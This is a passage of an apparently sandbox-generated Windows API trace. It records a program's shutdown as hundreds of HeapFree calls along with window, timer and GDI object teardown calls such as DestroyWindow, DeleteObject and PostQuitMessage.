dwFlags=0x0, lpMem=0xdf6408 | out: hHeap=0xbe0000) returned 1 [0250.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0250.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xea2ce0 | out: hHeap=0xbe0000) returned 1 [0250.895] DeleteObject (ho=0x370a01db) returned 1 [0250.895] DestroyWindow (hWnd=0x300a2) returned 1 [0250.895] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.895] NtdllDialogWndProc_W () returned 0x0 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41b8 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532e0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xea2d88 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52760 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526a0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52640 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3fc0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52600 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3fa8 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe525f0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3f90 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe525e0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3f78 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe525d0 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3f60 | out: hHeap=0xbe0000) returned 1 [0250.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe525c0 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3f48 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe525b0 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3f30 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe525a0 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3f18 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52590 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3f00 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52580 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3ee8 | out: hHeap=0xbe0000) returned 1 [0250.897] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52570 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3ed0 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52560 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3eb8 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52550 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3ea0 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52540 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e88 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52530 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e70 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52520 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e58 | out: hHeap=0xbe0000) returned 1 [0250.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe524f0 | out: hHeap=0xbe0000) returned 1 [0250.901] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe19658 | out: hHeap=0xbe0000) returned 1 [0250.901] KillTimer (hWnd=0x0, uIDEvent=0x7fe4) returned 1 [0250.901] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52610 | out: hHeap=0xbe0000) returned 1 [0250.901] NtdllDialogWndProc_W () returned 0x0 [0250.903] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.903] NtdllDialogWndProc_W () returned 0x0 [0250.904] DeleteObject (ho=0x13100700) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88e0 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a18 | out: hHeap=0xbe0000) returned 1 [0250.904] DeleteObject (ho=0x141001d3) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89d0 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89a0 | out: hHeap=0xbe0000) returned 1 [0250.904] DeleteObject (ho=0x241001d8) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4080 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3de0 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53280 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6378 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53230 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08bc8 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08bf8 | out: hHeap=0xbe0000) returned 1 [0250.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53130 | out: hHeap=0xbe0000) returned 1 [0250.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b38 | out: hHeap=0xbe0000) returned 1 [0250.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53160 | out: hHeap=0xbe0000) returned 1 [0250.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1c570 | out: hHeap=0xbe0000) returned 1 [0250.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53150 | out: hHeap=0xbe0000) returned 1 [0250.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6498 | out: hHeap=0xbe0000) returned 1 [0250.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53140 | out: hHeap=0xbe0000) returned 1 [0250.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc37a88 | out: hHeap=0xbe0000) returned 1 [0250.905] PostQuitMessage (nExitCode=0) [0250.905] GetMessageW (in: lpMsg=0x8bf9bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x8bf9bc) returned 0 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8b00 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8f08 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9630 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9268 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce95e0 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58b0 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9298 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9280 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92b0 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92c8 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92e0 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9608 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8dd0 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ab8 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce95b8 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8650 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8aa0 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9568 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58a0 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf91f0 | out: hHeap=0xbe0000) returned 1 [0250.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf91d8 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9208 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9220 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9590 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce94f0 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5870 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9130 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9118 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9148 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ad0 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5880 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9178 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9160 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9540 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5890 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf91a8 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9190 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf91c0 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9518 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf86c8 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5840 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9058 | out: hHeap=0xbe0000) returned 1 [0250.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9040 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8a88 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5850 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9088 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9070 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf90a0 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8b30 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5860 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf90d0 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf90b8 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf90e8 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9100 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce94c8 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8b48 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5800 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8f38 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8f20 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe5c0 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5810 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8f68 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8f50 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8f80 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce94a0 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5820 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8fb0 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8f98 | out: hHeap=0xbe0000) returned 1 [0250.908] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8fc8 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc63678 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5830 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ff8 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8fe0 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9010 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9028 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9478 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8668 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf57c0 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8e00 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8de8 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe588 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf57d0 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8e30 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8e18 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8e48 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9428 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf57e0 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8e78 | out: hHeap=0xbe0000) returned 1 [0250.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8e60 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8e90 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe5f8 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf57f0 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ec0 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ea8 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ed8 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ef0 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9450 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8b18 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5780 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf86e0 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8740 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe550 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5790 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8cf8 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ce0 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8d10 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce93d8 | out: hHeap=0xbe0000) returned 1 [0250.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf57a0 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8d40 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8d28 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8d58 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8698 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf57b0 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8d88 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8d70 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8da0 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8db8 | out: hHeap=0xbe0000) returned 1 [0250.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9400 | out: hHeap=0xbe0000) returned 1 [0250.913] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8710 | out: hHeap=0xbe0000) returned 1 [0250.913] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5740 | out: hHeap=0xbe0000) returned 1 [0250.913] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8b78 | out: hHeap=0xbe0000) returned 1 [0250.913] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8b60 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8728 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5750 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ba8 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8b90 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8bc0 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8a70 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5760 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8bf0 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8bd8 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8c08 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce93b0 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5770 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8c38 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8c20 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8c50 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8c68 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8c80 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8c98 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8cb0 | out: 